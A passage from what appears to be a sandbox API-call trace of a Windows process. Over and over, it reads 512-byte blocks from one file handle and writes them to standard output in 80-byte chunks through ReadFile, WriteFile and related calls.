0x4c [0235.366] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf0a0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0f4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0a0*, lpNumberOfBytesWritten=0x2ce0f4*=0x50, lpOverlapped=0x0) returned 1 [0235.366] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.366] GetFileType (hFile=0x4c) returned 0x1 [0235.366] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.366] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf0f0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ce0f4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0f0*, lpNumberOfBytesWritten=0x2ce0f4*=0x20, lpOverlapped=0x0) returned 1 [0235.366] _get_osfhandle (_FileHandle=4) returned 0x54 [0235.366] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ce0e0 | out: lpNewFilePointer=0x0) returned 1 [0235.366] _get_osfhandle (_FileHandle=4) returned 0x54 [0235.366] ReadFile (in: hFile=0x54, lpBuffer=0x2cef10, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce100, lpOverlapped=0x0 | out: lpBuffer=0x2cef10*, lpNumberOfBytesRead=0x2ce100*=0x200, lpOverlapped=0x0) returned 1 [0235.366] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.366] GetFileType (hFile=0x4c) returned 0x1 [0235.366] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.366] GetFileType (hFile=0x4c) returned 0x1 [0235.366] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.366] WriteFile (in: hFile=0x4c, lpBuffer=0x2cef10*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0f4, lpOverlapped=0x0 | out: lpBuffer=0x2cef10*, lpNumberOfBytesWritten=0x2ce0f4*=0x50, lpOverlapped=0x0) returned 1 [0235.366] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.366] GetFileType (hFile=0x4c) returned 0x1 [0235.366] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.366] WriteFile (in: hFile=0x4c, lpBuffer=0x2cef60*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0f4, lpOverlapped=0x0 | out: lpBuffer=0x2cef60*, lpNumberOfBytesWritten=0x2ce0f4*=0x50, lpOverlapped=0x0) 
returned 1 [0235.367] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.367] GetFileType (hFile=0x4c) returned 0x1 [0235.367] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.367] WriteFile (in: hFile=0x4c, lpBuffer=0x2cefb0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0f4, lpOverlapped=0x0 | out: lpBuffer=0x2cefb0*, lpNumberOfBytesWritten=0x2ce0f4*=0x50, lpOverlapped=0x0) returned 1 [0235.367] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.367] GetFileType (hFile=0x4c) returned 0x1 [0235.367] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.367] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf000*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0f4, lpOverlapped=0x0 | out: lpBuffer=0x2cf000*, lpNumberOfBytesWritten=0x2ce0f4*=0x50, lpOverlapped=0x0) returned 1 [0235.367] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.367] GetFileType (hFile=0x4c) returned 0x1 [0235.367] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.367] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf050*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0f4, lpOverlapped=0x0 | out: lpBuffer=0x2cf050*, lpNumberOfBytesWritten=0x2ce0f4*=0x50, lpOverlapped=0x0) returned 1 [0235.367] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.367] GetFileType (hFile=0x4c) returned 0x1 [0235.367] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.367] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf0a0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0f4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0a0*, lpNumberOfBytesWritten=0x2ce0f4*=0x50, lpOverlapped=0x0) returned 1 [0235.367] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.367] GetFileType (hFile=0x4c) returned 0x1 [0235.367] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.367] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf0f0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ce0f4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0f0*, lpNumberOfBytesWritten=0x2ce0f4*=0x20, lpOverlapped=0x0) returned 1 [0235.367] _get_osfhandle 
(_FileHandle=4) returned 0x54 [0235.367] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ce0e0 | out: lpNewFilePointer=0x0) returned 1 [0235.367] _get_osfhandle (_FileHandle=4) returned 0x54 [0235.367] ReadFile (in: hFile=0x54, lpBuffer=0x2cef10, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce100, lpOverlapped=0x0 | out: lpBuffer=0x2cef10*, lpNumberOfBytesRead=0x2ce100*=0x200, lpOverlapped=0x0) returned 1 [0235.367] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.367] GetFileType (hFile=0x4c) returned 0x1 [0235.367] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.367] GetFileType (hFile=0x4c) returned 0x1 [0235.367] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.367] WriteFile (in: hFile=0x4c, lpBuffer=0x2cef10*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0f4, lpOverlapped=0x0 | out: lpBuffer=0x2cef10*, lpNumberOfBytesWritten=0x2ce0f4*=0x50, lpOverlapped=0x0) returned 1 [0235.368] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.368] GetFileType (hFile=0x4c) returned 0x1 [0235.368] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.368] WriteFile (in: hFile=0x4c, lpBuffer=0x2cef60*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0f4, lpOverlapped=0x0 | out: lpBuffer=0x2cef60*, lpNumberOfBytesWritten=0x2ce0f4*=0x50, lpOverlapped=0x0) returned 1 [0235.368] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.368] GetFileType (hFile=0x4c) returned 0x1 [0235.368] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.368] WriteFile (in: hFile=0x4c, lpBuffer=0x2cefb0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0f4, lpOverlapped=0x0 | out: lpBuffer=0x2cefb0*, lpNumberOfBytesWritten=0x2ce0f4*=0x50, lpOverlapped=0x0) returned 1 [0235.368] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.368] GetFileType (hFile=0x4c) returned 0x1 [0235.368] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.368] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf000*, nNumberOfBytesToWrite=0x50, 
lpNumberOfBytesWritten=0x2ce0f4, lpOverlapped=0x0 | out: lpBuffer=0x2cf000*, lpNumberOfBytesWritten=0x2ce0f4*=0x50, lpOverlapped=0x0) returned 1 [0235.368] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.368] GetFileType (hFile=0x4c) returned 0x1 [0235.368] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.368] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf050*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0f4, lpOverlapped=0x0 | out: lpBuffer=0x2cf050*, lpNumberOfBytesWritten=0x2ce0f4*=0x50, lpOverlapped=0x0) returned 1 [0235.368] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.368] GetFileType (hFile=0x4c) returned 0x1 [0235.368] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.368] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf0a0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0f4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0a0*, lpNumberOfBytesWritten=0x2ce0f4*=0x50, lpOverlapped=0x0) returned 1 [0235.368] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.368] GetFileType (hFile=0x4c) returned 0x1 [0235.368] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.368] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf0f0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ce0f4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0f0*, lpNumberOfBytesWritten=0x2ce0f4*=0x20, lpOverlapped=0x0) returned 1 [0235.368] _get_osfhandle (_FileHandle=4) returned 0x54 [0235.368] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ce0e0 | out: lpNewFilePointer=0x0) returned 1 [0235.368] _get_osfhandle (_FileHandle=4) returned 0x54 [0235.368] ReadFile (in: hFile=0x54, lpBuffer=0x2cef10, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce100, lpOverlapped=0x0 | out: lpBuffer=0x2cef10*, lpNumberOfBytesRead=0x2ce100*=0x200, lpOverlapped=0x0) returned 1 [0235.369] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.369] GetFileType (hFile=0x4c) returned 0x1 [0235.369] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.369] GetFileType 
(hFile=0x4c) returned 0x1 [0235.369] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.369] WriteFile (in: hFile=0x4c, lpBuffer=0x2cef10*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0f4, lpOverlapped=0x0 | out: lpBuffer=0x2cef10*, lpNumberOfBytesWritten=0x2ce0f4*=0x50, lpOverlapped=0x0) returned 1 [0235.369] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.369] GetFileType (hFile=0x4c) returned 0x1 [0235.369] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.369] WriteFile (in: hFile=0x4c, lpBuffer=0x2cef60*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0f4, lpOverlapped=0x0 | out: lpBuffer=0x2cef60*, lpNumberOfBytesWritten=0x2ce0f4*=0x50, lpOverlapped=0x0) returned 1 [0235.369] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.369] GetFileType (hFile=0x4c) returned 0x1 [0235.369] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.369] WriteFile (in: hFile=0x4c, lpBuffer=0x2cefb0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0f4, lpOverlapped=0x0 | out: lpBuffer=0x2cefb0*, lpNumberOfBytesWritten=0x2ce0f4*=0x50, lpOverlapped=0x0) returned 1 [0235.369] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.369] GetFileType (hFile=0x4c) returned 0x1 [0235.369] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.369] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf000*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0f4, lpOverlapped=0x0 | out: lpBuffer=0x2cf000*, lpNumberOfBytesWritten=0x2ce0f4*=0x50, lpOverlapped=0x0) returned 1 [0235.369] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.369] GetFileType (hFile=0x4c) returned 0x1 [0235.369] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.369] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf050*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0f4, lpOverlapped=0x0 | out: lpBuffer=0x2cf050*, lpNumberOfBytesWritten=0x2ce0f4*=0x50, lpOverlapped=0x0) returned 1 [0235.369] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.369] GetFileType (hFile=0x4c) returned 0x1 [0235.369] 
_get_osfhandle (_FileHandle=1) returned 0x4c [0235.369] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf0a0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0f4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0a0*, lpNumberOfBytesWritten=0x2ce0f4*=0x50, lpOverlapped=0x0) returned 1 [0235.369] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.369] GetFileType (hFile=0x4c) returned 0x1 [0235.369] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.369] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf0f0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ce0f4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0f0*, lpNumberOfBytesWritten=0x2ce0f4*=0x20, lpOverlapped=0x0) returned 1 [0235.370] _get_osfhandle (_FileHandle=4) returned 0x54 [0235.370] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ce0e0 | out: lpNewFilePointer=0x0) returned 1 [0235.370] _get_osfhandle (_FileHandle=4) returned 0x54 [0235.370] ReadFile (in: hFile=0x54, lpBuffer=0x2cef10, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce100, lpOverlapped=0x0 | out: lpBuffer=0x2cef10*, lpNumberOfBytesRead=0x2ce100*=0x200, lpOverlapped=0x0) returned 1 [0235.370] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.370] GetFileType (hFile=0x4c) returned 0x1 [0235.370] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.370] GetFileType (hFile=0x4c) returned 0x1 [0235.370] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.370] WriteFile (in: hFile=0x4c, lpBuffer=0x2cef10*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0f4, lpOverlapped=0x0 | out: lpBuffer=0x2cef10*, lpNumberOfBytesWritten=0x2ce0f4*=0x50, lpOverlapped=0x0) returned 1 [0235.370] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.370] GetFileType (hFile=0x4c) returned 0x1 [0235.370] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.370] WriteFile (in: hFile=0x4c, lpBuffer=0x2cef60*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0f4, lpOverlapped=0x0 | out: lpBuffer=0x2cef60*, 
lpNumberOfBytesWritten=0x2ce0f4*=0x50, lpOverlapped=0x0) returned 1 [0235.370] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.370] GetFileType (hFile=0x4c) returned 0x1 [0235.370] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.370] WriteFile (in: hFile=0x4c, lpBuffer=0x2cefb0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0f4, lpOverlapped=0x0 | out: lpBuffer=0x2cefb0*, lpNumberOfBytesWritten=0x2ce0f4*=0x50, lpOverlapped=0x0) returned 1 [0235.370] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.370] GetFileType (hFile=0x4c) returned 0x1 [0235.370] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.370] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf000*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0f4, lpOverlapped=0x0 | out: lpBuffer=0x2cf000*, lpNumberOfBytesWritten=0x2ce0f4*=0x50, lpOverlapped=0x0) returned 1 [0235.370] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.370] GetFileType (hFile=0x4c) returned 0x1 [0235.370] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.370] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf050*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0f4, lpOverlapped=0x0 | out: lpBuffer=0x2cf050*, lpNumberOfBytesWritten=0x2ce0f4*=0x50, lpOverlapped=0x0) returned 1 [0235.370] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.370] GetFileType (hFile=0x4c) returned 0x1 [0235.370] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.370] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf0a0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0f4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0a0*, lpNumberOfBytesWritten=0x2ce0f4*=0x50, lpOverlapped=0x0) returned 1 [0235.371] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.371] GetFileType (hFile=0x4c) returned 0x1 [0235.371] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.371] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf0f0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ce0f4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0f0*, lpNumberOfBytesWritten=0x2ce0f4*=0x20, 
lpOverlapped=0x0) returned 1 [0235.371] _get_osfhandle (_FileHandle=4) returned 0x54 [0235.371] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ce0e0 | out: lpNewFilePointer=0x0) returned 1 [0235.371] _get_osfhandle (_FileHandle=4) returned 0x54 [0235.371] ReadFile (in: hFile=0x54, lpBuffer=0x2cef10, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce100, lpOverlapped=0x0 | out: lpBuffer=0x2cef10*, lpNumberOfBytesRead=0x2ce100*=0x200, lpOverlapped=0x0) returned 1 [0235.371] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.371] GetFileType (hFile=0x4c) returned 0x1 [0235.371] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.371] GetFileType (hFile=0x4c) returned 0x1 [0235.371] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.371] WriteFile (in: hFile=0x4c, lpBuffer=0x2cef10*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0f4, lpOverlapped=0x0 | out: lpBuffer=0x2cef10*, lpNumberOfBytesWritten=0x2ce0f4*=0x50, lpOverlapped=0x0) returned 1 [0235.371] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.371] GetFileType (hFile=0x4c) returned 0x1 [0235.371] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.371] WriteFile (in: hFile=0x4c, lpBuffer=0x2cef60*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0f4, lpOverlapped=0x0 | out: lpBuffer=0x2cef60*, lpNumberOfBytesWritten=0x2ce0f4*=0x50, lpOverlapped=0x0) returned 1 [0235.371] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.371] GetFileType (hFile=0x4c) returned 0x1 [0235.371] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.371] WriteFile (in: hFile=0x4c, lpBuffer=0x2cefb0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0f4, lpOverlapped=0x0 | out: lpBuffer=0x2cefb0*, lpNumberOfBytesWritten=0x2ce0f4*=0x50, lpOverlapped=0x0) returned 1 [0235.371] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.371] GetFileType (hFile=0x4c) returned 0x1 [0235.372] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.372] WriteFile (in: hFile=0x4c, 
lpBuffer=0x2cf000*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0f4, lpOverlapped=0x0 | out: lpBuffer=0x2cf000*, lpNumberOfBytesWritten=0x2ce0f4*=0x50, lpOverlapped=0x0) returned 1 [0235.372] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.372] GetFileType (hFile=0x4c) returned 0x1 [0235.372] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.372] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf050*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0f4, lpOverlapped=0x0 | out: lpBuffer=0x2cf050*, lpNumberOfBytesWritten=0x2ce0f4*=0x50, lpOverlapped=0x0) returned 1 [0235.372] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.372] GetFileType (hFile=0x4c) returned 0x1 [0235.372] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.372] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf0a0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0f4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0a0*, lpNumberOfBytesWritten=0x2ce0f4*=0x50, lpOverlapped=0x0) returned 1 [0235.372] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.372] GetFileType (hFile=0x4c) returned 0x1 [0235.372] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.372] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf0f0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ce0f4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0f0*, lpNumberOfBytesWritten=0x2ce0f4*=0x20, lpOverlapped=0x0) returned 1 [0235.372] _get_osfhandle (_FileHandle=4) returned 0x54 [0235.372] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ce0e0 | out: lpNewFilePointer=0x0) returned 1 [0235.372] _get_osfhandle (_FileHandle=4) returned 0x54 [0235.372] ReadFile (in: hFile=0x54, lpBuffer=0x2cef10, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce100, lpOverlapped=0x0 | out: lpBuffer=0x2cef10*, lpNumberOfBytesRead=0x2ce100*=0x200, lpOverlapped=0x0) returned 1 [0235.372] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.372] GetFileType (hFile=0x4c) returned 0x1 [0235.372] _get_osfhandle 
(_FileHandle=1) returned 0x4c [0235.372] GetFileType (hFile=0x4c) returned 0x1 [0235.372] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.373] WriteFile (in: hFile=0x4c, lpBuffer=0x2cef10*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0f4, lpOverlapped=0x0 | out: lpBuffer=0x2cef10*, lpNumberOfBytesWritten=0x2ce0f4*=0x50, lpOverlapped=0x0) returned 1 [0235.373] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.373] GetFileType (hFile=0x4c) returned 0x1 [0235.373] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.373] WriteFile (in: hFile=0x4c, lpBuffer=0x2cef60*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0f4, lpOverlapped=0x0 | out: lpBuffer=0x2cef60*, lpNumberOfBytesWritten=0x2ce0f4*=0x50, lpOverlapped=0x0) returned 1 [0235.373] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.373] GetFileType (hFile=0x4c) returned 0x1 [0235.373] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.373] WriteFile (in: hFile=0x4c, lpBuffer=0x2cefb0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0f4, lpOverlapped=0x0 | out: lpBuffer=0x2cefb0*, lpNumberOfBytesWritten=0x2ce0f4*=0x50, lpOverlapped=0x0) returned 1 [0235.373] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.373] GetFileType (hFile=0x4c) returned 0x1 [0235.373] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.373] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf000*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0f4, lpOverlapped=0x0 | out: lpBuffer=0x2cf000*, lpNumberOfBytesWritten=0x2ce0f4*=0x50, lpOverlapped=0x0) returned 1 [0235.373] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.373] GetFileType (hFile=0x4c) returned 0x1 [0235.373] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.373] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf050*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0f4, lpOverlapped=0x0 | out: lpBuffer=0x2cf050*, lpNumberOfBytesWritten=0x2ce0f4*=0x50, lpOverlapped=0x0) returned 1 [0235.373] _get_osfhandle (_FileHandle=1) returned 0x4c 
[0235.373] GetFileType (hFile=0x4c) returned 0x1 [0235.373] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.373] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf0a0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0f4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0a0*, lpNumberOfBytesWritten=0x2ce0f4*=0x50, lpOverlapped=0x0) returned 1 [0235.374] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.374] GetFileType (hFile=0x4c) returned 0x1 [0235.374] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.374] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf0f0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ce0f4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0f0*, lpNumberOfBytesWritten=0x2ce0f4*=0x20, lpOverlapped=0x0) returned 1 [0235.374] _get_osfhandle (_FileHandle=4) returned 0x54 [0235.374] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ce0e0 | out: lpNewFilePointer=0x0) returned 1 [0235.374] _get_osfhandle (_FileHandle=4) returned 0x54 [0235.374] ReadFile (in: hFile=0x54, lpBuffer=0x2cef10, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce100, lpOverlapped=0x0 | out: lpBuffer=0x2cef10*, lpNumberOfBytesRead=0x2ce100*=0x200, lpOverlapped=0x0) returned 1 [0235.374] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.374] GetFileType (hFile=0x4c) returned 0x1 [0235.374] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.374] GetFileType (hFile=0x4c) returned 0x1 [0235.374] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.374] WriteFile (in: hFile=0x4c, lpBuffer=0x2cef10*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0f4, lpOverlapped=0x0 | out: lpBuffer=0x2cef10*, lpNumberOfBytesWritten=0x2ce0f4*=0x50, lpOverlapped=0x0) returned 1 [0235.374] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.374] GetFileType (hFile=0x4c) returned 0x1 [0235.374] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.374] WriteFile (in: hFile=0x4c, lpBuffer=0x2cef60*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0f4, 
lpOverlapped=0x0 | out: lpBuffer=0x2cef60*, lpNumberOfBytesWritten=0x2ce0f4*=0x50, lpOverlapped=0x0) returned 1 [0235.374] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.374] GetFileType (hFile=0x4c) returned 0x1 [0235.374] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.374] WriteFile (in: hFile=0x4c, lpBuffer=0x2cefb0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0f4, lpOverlapped=0x0 | out: lpBuffer=0x2cefb0*, lpNumberOfBytesWritten=0x2ce0f4*=0x50, lpOverlapped=0x0) returned 1 [0235.375] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.375] GetFileType (hFile=0x4c) returned 0x1 [0235.375] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.375] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf000*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0f4, lpOverlapped=0x0 | out: lpBuffer=0x2cf000*, lpNumberOfBytesWritten=0x2ce0f4*=0x50, lpOverlapped=0x0) returned 1 [0235.375] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.375] GetFileType (hFile=0x4c) returned 0x1 [0235.375] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.375] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf050*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0f4, lpOverlapped=0x0 | out: lpBuffer=0x2cf050*, lpNumberOfBytesWritten=0x2ce0f4*=0x50, lpOverlapped=0x0) returned 1 [0235.375] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.375] GetFileType (hFile=0x4c) returned 0x1 [0235.375] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.375] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf0a0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0f4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0a0*, lpNumberOfBytesWritten=0x2ce0f4*=0x50, lpOverlapped=0x0) returned 1 [0235.375] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.375] GetFileType (hFile=0x4c) returned 0x1 [0235.375] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.375] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf0f0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ce0f4, lpOverlapped=0x0 | out: 
